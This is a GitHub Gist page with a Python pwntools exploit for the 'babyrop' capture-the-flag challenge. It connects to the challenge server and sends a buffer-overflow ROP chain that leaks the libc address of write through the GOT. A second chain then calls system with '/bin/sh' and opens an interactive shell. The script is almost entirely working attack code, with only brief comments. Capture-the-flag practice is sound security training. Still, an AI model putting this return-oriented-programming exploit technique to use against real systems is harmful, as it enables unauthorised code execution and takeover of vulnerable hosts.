Created
February 8, 2021 00:15
-
-
Save Adikso/7b0cd4aecc5639490461f85cfc5d8976 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
r = remote('dicec.tf', 31924) | |
elf = ELF('babyrop') | |
rop = ROP(elf) | |
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') | |
libc_write = libc.symbols['write'] | |
# Garbage | |
r.readuntil('Your name: ') | |
# Part 1 - Obtaining libc base address | |
got_write = elf.symbols['got.write'] | |
payload = b'A' * 72 | |
# pop rbx | |
# pop rbp | |
# pop r12 | |
# pop r13 | |
# pop r14 | |
# pop r15 | |
payload += p64(0x004011ca) # 'pop rbx', 'pop rbp', 'pop r12', 'pop r13', 'pop r14', 'pop r15', 'ret' | |
payload += p64(0) # have to be zero for call address calculation | |
payload += p64(1) # new rbp | |
payload += p64(1) # r12 - stdin | |
payload += p64(got_write) # r13 - pointer | |
payload += p64(8) # r14 - count to write | |
payload += p64(got_write) # r15 - reloc.write | |
# mov rdx, r14 | |
# mov rsi, r13 | |
# mov edi, r12d | |
# call qword [r15 + rbx*8] | |
payload += p64(0x004011b0) # magic | |
# Fix rbp | |
payload += b'C' * 56 | |
payload += p64(0x00401137) # second instruction of main | |
r.sendline(payload) | |
# Calculate libc address | |
address = u64(r.read(8)) | |
libc.address = address - libc_write | |
log.info(f'Found write @ {hex(address)}') | |
log.info(f'Found libc base @ {hex(libc.address)}') | |
# Garbage | |
r.readuntil('Your name: ') | |
# # Part 2 - Execute shell | |
pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0] | |
bin_sh = next(libc.search(b"/bin/sh\x00")) | |
system = libc.symbols['system'] | |
payload = b'A' * 72 | |
payload += p64(pop_rdi) | |
payload += p64(bin_sh) | |
payload += p64(system) | |
r.sendline(payload) | |
r.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment